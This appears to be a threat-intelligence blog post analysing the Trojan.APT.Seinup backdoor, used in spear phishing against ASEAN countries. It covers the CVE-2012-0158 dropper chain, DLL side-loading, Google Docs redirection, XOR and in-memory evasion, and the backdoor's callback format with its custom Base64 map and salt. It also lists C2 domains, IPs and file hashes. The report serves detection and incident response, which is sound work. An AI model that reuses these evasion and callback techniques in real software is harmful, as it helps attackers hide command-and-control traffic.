Trojan.APT.Seinup Hitting ASEAN

1. Executive Summary

The FireEye research team has recently identified a number of spear
phishing activities targeting Asia and ASEAN. Of these, one of the
spear phishing documents was suspected to have used a potentially
stolen document as a decoy. The rich and contextual details (body and
metadata) which are not available online lead us to believe this was
stolen. This decoy document mentioned countries such as Brunei,
Cambodia, Indonesia, Laos, Malaysia, Myanmar, Philippines, Singapore,
Thailand, and Vietnam, which leads us to suspect that these countries
are targeted. As the content of this decoy document is suspected to be
a stolen sensitive document, the details will not be published.

This malware was found to have used a number of advance techniques
which makes it interesting:

  1. The malware leverages Google Docs to perform redirection to
    evade callback detection. This technique was also found in the
    malware dubbed “Backdoor.Makadocs” reported by Takashi
    Katsuki (Katsuki, 2012).
  2. It is heavily equipped with a
    variety of cryptographic functions to perform some of its functions
    securely.
  3. The malicious DLL is manually loaded into memory
    which hides from DLL listing.

As depicted in the diagram below, the spear phishing document (which
exploits CVE-2012-0158) creates a decoy document and a malware dropper
named exp1ore.exe. This dropper will then drop wab.exe (Address Book
Application) and wab32res.dll (malicious DLL) inside the temp folder.
By running wab.exe, the malicious DLL named wab32res.dll (located
within the same folder) will be loaded using DLL side-loading
technique. This will in turn install a copy of wab32res.dll as
msnetrsvw.exe inside the windows directory to be registered as Windows
service. By registering as a Windows service, it allows the malware to
survive every reboot and persist on the network.

1.MalwareFlow

Figure 1 Infection Flow

This malware is named “Trojan.APT.Seinup” because one of its export
functions is named “seinup”. This malware was analysed to be a
backdoor that allows the attacker to remote control the infected system.

2.ExportedFunctions

Figure 2 Exported Functions

2. Related APT Domain and MD5

Based on our threat intelligence and reverse-engineering effort,
below are some related domain and MD5 sums. Please note that some of
the domain/IP association may change.

2.1. Related Domain

Domain/URL IP Country Comments

elizabearden.com
elizabearden.com

124.172.243.211
124.172.243.211

CN
CN
Registrar:
XIN NET TECHNOLOGY CORPORATIONEmail:
liangcheng04@sina.com
Registrar: XIN NET
TECHNOLOGY CORPORATIONEmail: liangcheng04@sina.com

dnsserviceonline.com
dnsserviceonline.com

50.117.115.83
50.117.115.84
50.117.120.235
69.46.84.51
50.117.115.83
50.117.115.84
50.117.120.235
69.46.84.51

CN
CN
Registrar:
XIN NET TECHNOLOGY CORPORATIONEmail:
liangcheng04@sina.com
Registrar: XIN NET
TECHNOLOGY CORPORATIONEmail: liangcheng04@sina.com

symteconline.com
symteconline.com

175.100.206.183
175.100.206.183

CN
CN
Registrar:
XIN NET TECHNOLOGY CORPORATIONEmail:
Smartwise9851@yahoo.com
Registrar: XIN NET
TECHNOLOGY CORPORATIONEmail: Smartwise9851@yahoo.com

winshell.net
winshell.net

58.64.190.34
58.64.190.34

HK
HK
Registrar:
SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO.,
LTD.Email:
richardmatind@yahoo.com

Registrar: SHANGHAI
MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO., LTD.Email:

richardmatind@yahoo.com

philnewsonline.com
philnewsonline.com

50.93.198.128
50.93.198.128

US
US
Registrar:
GODADDY.COM, LLCEmail: woooyeahh11@yahoo.com

Registrar:
GODADDY.COM, LLCEmail: woooyeahh11@yahoo.com

www.info-week.com
www.info-week.com

173.254.197.213
173.254.197.213

US
US
Registrar:
GODADDY.COM, LLCEmail: woooyeahh11@yahoo.com

Registrar:
GODADDY.COM, LLCEmail: woooyeahh11@yahoo.com

go-twitter.com
go-twitter.com

50.93.198.113
50.93.198.113

US
US
Registrar:
GODADDY.COM, LLCEmail: woooyeahh11@yahoo.com

Registrar:
GODADDY.COM, LLCEmail: woooyeahh11@yahoo.com

2.2. Associated Files

Name MD5 Comments

Spear-phishing document and decoy
document
Spear-phishing document and
decoy document
CONFIDENTIAL CONFIDENTIAL
CONFIDENTIAL
CONFIDENTIAL

iexp1ore.exe
iexp1ore.exe

137F3D11559E9D986D510AF34CB61FBC
137F3D11559E9D986D510AF34CB61FBC

Dropper
Dropper

wab.exe
wab.exe

CE67AAA163A4915BA408B2C1D5CCC7CC
CE67AAA163A4915BA408B2C1D5CCC7CC

Benign Address Book Application
Benign Address Book
Application

wab32res.dll
wab32res.dll

FB2FA42F052D0A86CBDCE03F5C46DD4D
FB2FA42F052D0A86CBDCE03F5C46DD4D

Malware to be side loaded when wab.exe is
launched.
Malware to be side loaded
when wab.exe is launched.

msnetrsvw.exe
msnetrsvw.exe

FB2FA42F052D0A86CBDCE03F5C46DD4D
FB2FA42F052D0A86CBDCE03F5C46DD4D

Malware to be installed as a service. Note: This is
the same as wab32res.dll.
Malware to be installed as
a service. Note: This is the same as wab32res.dll.

 
 

baf227a9f0b21e710c65d01f2ab01244
baf227a9f0b21e710c65d01f2ab01244

Calls to www.elizabearden.com:80
Calls to
www.elizabearden.com:80

 
 

0845f03d669e24144df785ee54f6ad74
0845f03d669e24144df785ee54f6ad74

Calls to www.dnsserviceonline.com:80

Calls to
www.dnsserviceonline.com:80

 
 

d64a22ea3accc712aebaa047ab818b07
d64a22ea3accc712aebaa047ab818b07

Calls to www.elizabearden.com:80
Calls to
www.elizabearden.com:80

 
 

56e6c27f9952e79d57d0b32d16c26811
56e6c27f9952e79d57d0b32d16c26811

Calls to www.elizabearden.com:80
Calls to
www.elizabearden.com:80

 
 

cdd969121a2e755ef3dc1a7bf7f18b24
cdd969121a2e755ef3dc1a7bf7f18b24

Calls to www.elizabearden.com:80
Calls to
www.elizabearden.com:80

 
 

709c71c128a876b73d034cde5e3ec1d3
709c71c128a876b73d034cde5e3ec1d3

Calls to www.dnsserviceonline.com:80

Calls to
www.dnsserviceonline.com:80

3. Interesting Technical Observations

3.1. Redirection Using Google Docs

By connecting the malicious server via Google Docs, the malicious
communication is protected by the legitimate SSL provided by Google
Docs (see Figure below). One possible way to examine the SSL traffic
is to make use of a hardware SSL decrypter within an organisation.
Alternatively, you may want to examine the usage pattern of the users.
Suppose a particular user accesses Google Docs multiple times a day,
the organization’s Incident Response team may want to dig deeper to
find out if the traffic is triggered by a human or by malware.

Retrieve Command

Figure 3 Retrieve Command via Google Docs

Below is the code that is used to construct a URL that retrieves
command via Google Docs. First, the malicious URL is constructed and
then encoded. Next, the malware simply leverages the Google Docs
viewer to retrieve the command from the malicious server (see Figure
below). 4.GoogleDocs

Figure 4 View Command via GoogleDocs

3.2. Zero-Skipping XOR Encryption

The shellcode encryption technique is fairly standard. The shellcode
has a decryption stub which decrypts its body using the XOR key 0x9E,
and this shellcode is used to extract exp1ore.exe(malware) and Wor.doc
(benign document).

The exp1ore.exe and Wor.doc were found within the spear phishing
document encrypted using the same key (0xFC) and technique. The XOR
key decrypts only a non-zero byte (see Figure 5). This prevents
statistical methods of recovering the XOR key. The encrypted
executable file and benign document were identified to be located
inside the spear phishing document at offsets 0x2509 and 0x43509 respectively.

5.ZeroSkipping

Figure 5 Zero Skipping XOR Encryption

Even though statistical methods may not be useful in identifying the
XOR key as the zero bytes are not encrypted, we could use some of the
“known” strings below to hunt for the XOR key in this situation. By
sliding the known string across the array of bytes to perform a
windowed XOR, the key would be revealed when the encoded data is XORed
with the known string.

  • “This program cannot be run in DOS mode”
  • “KERNEL32.dll”
  • “LoadLibraryA”

3.3. Deployment of Various Cryptographic Functions

3.3.1. Secure Callback

The malware performs the callback in a secure manner. It uses a
custom Base64 map to encode its data, and creates a salted digital
thumbprint to allow validation of data.

Below describes the steps to validate a callback using an example of
the following URL:

hxxp://www.elizabearden.com/waterphp/BYyH.php?dEIXozUlFzx=

5P

&wDq=

6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S+w8npH5oAZk==

&k4fJdSp7=

cc3237bc79192a096440faca0fdae10

&GvQF2lotIr5bT2=

349118df672db38f9e65659874b60b27

The URL could be generalised as follows:

Domain/<PHP>?<rand 11-13 char>=
<A’>
&<rand 3-5 char>=
<B’>
&<rand 7-9 char>=
<C’>
&<rand 14-16
chars>=
<D’>

The definition of A’, B’, C’ and D’ are as follows:

Let H be the function which encodes binary into hexadecimal
characters prepend with “%”, if it is not alphanumeric, dash,
underscore or dot
.

Let B64 be the base 64 encoder using the following custom map, “URPBnCF1GuJwH2vbkLN6OQ/5S9TVxXKZaMc8defgiWjmo7pqrAstyz0D+El3I4hY”.

Let PT be the plain text which is in the form of
“<HostName>[<RunType>]:<IPAddress>{1}”,
where HostName and IPAddress are string, and RunType is a character.

Let A be the random of 3 to 7 characters, and A’ = H(A)

Let B be B64 (PT), and B’ = H(B)

Let C be 32 char deliminator, and C’ = H(C)

Let D be H( MD5 ( salt  + MD5 ( B64(PT) + A + C )  )   ), salt =
“%^^*HFH)*$FJK)234sd2N@C(JGl2z94cg23”  , and D’ = H(D)

Hence, in this case, the specific malicious URL could be applied as follows:

Domain/<PHP>  =  http://www.elizabearden.com/waterphp/BYyH.php

A’ = “5Pb

B’ = “6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S%2Bw8npH5oAZk==

C’ = “cc3237bc79192a096440faca0fdae107

D’ = “

349118df672db38f9e65659874b60b27
 
(This is the digital signature)

The hash could be verified as follow:

B64(PT) + A + C =
“6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S+w8npH5oAZk==” +  “5Pb” + “cc3237bc79192a096440faca0fdae107”

MD5 (B64(PT) + A + C) = “766cf9e96c1a508c59f7ade1c50ecd28”

MD5 (salt + MD5(B64(PT) + A + C))   = MD5 (
“%^^*HFH)*$FJK)234sd2N@C(JGl2z94cg23” + “766cf9e96c1a508c59f7ade1c50ecd28”)


= 349118df672db38f9e65659874b60b27
(This equals to D’, which means verified)

The encoded plain text (B) could be recovered:

B64(PT) = “6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S+w8npH5oAZk==”;

PT = “MY_COMPUTER_NAME[F]:192.168.1.1{1}”, where “MY_COMPUTER_NAME”
is the hostname, ‘F’ is the run type, “192.168.1.1” is the IP address.

Note: This example is mocked up using a dummy computer name and IP address.

The python code below could be used to decode the custom encoded
string (see Figure below).

6.PythonCode

Figure 6 Python to Decode a Custom Base 64

3.3.2. Random Generator Using Mersenne Twister Algorithm

The malware was found to perform a callback at random intervals so
as to evade network investigation when looking for network connections
that are performed in a regular interval. Additionally, even the name
of the parameters in the get string have a random length and name,
which makes it hard to create a fix signature to detect such callbacks
(see ‎3.3.1 to understand how a callback is created).

7.Mersenne_twister

Figure 7 Mersenne Twister Algorithm Seeding function

 3.4. In-Memory Only Malicious Code

On the disk, the malicious code is either encrypted or compressed to
evade scanning using signature rules. Only upon being loaded into
memory, does the malicious code (that appears to be in the form of a
DLL) get manually loaded without the use of Windows 32 API. In this
way, when an investigation is performed, the malicious DLL is not
revealed. Additionally, it makes it much harder for analysis to be performed.

8.ZC_Loader

Figure 8 Segments in the memory which contains the malicious code

Taking a deeper look at the decrypted malicious code, this malware
was found to contain at least the following functions:

  • Download file
  • Download and execute or load
    library
  • Change sleep duration
  • Open and close
    interactive sessions

4. Conclusion

Malware is increasingly becoming more contextually advanced. It
attempts to appear as much as possible like legitimate software or
documents. In this example, we would conclude the following.

  1. A potentially stolen document was used as a decoy document to
    increase its credibility. It is also a sign that the compromised
    organisations could be used as a soft target to compromise their
    business partners and allies.
  2. It is important to put a stop
    to the malware infection at the very beginning, which is the
    exploitation phase. Once a network is compromised, it is
    increasingly harder to detect such threats.
  3. Anti-incident
    response/forensic techniques are increasingly used to evade
    detection. It would require a keen eye on details and a wealth of
    experience to identify all these advance techniques.

5. Works Cited

Carnegie Mellon University. (n.d.). Retrieved from http://www.cs.cmu.edu/~fp/courses/15122-f10/misc/rand/mersenne.c0

Katsuki, T. (19 Nov, 2012). Malware Targeting Windows 8 Uses
Google Docs.
Retrieved from http://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs-0

I would like to thank several colleagues for their significant
contributions on this post: Darien Kindlund, Ned Moran, Nart
Villeneuve, and Thoufique Haq.

 

 

Share this post

Share on facebook
Share on linkedin
Share on print
Share on email

Subscribe to our Monthly Cyber Security Digest

Get monthly content to keep you up to date on the latest news and tips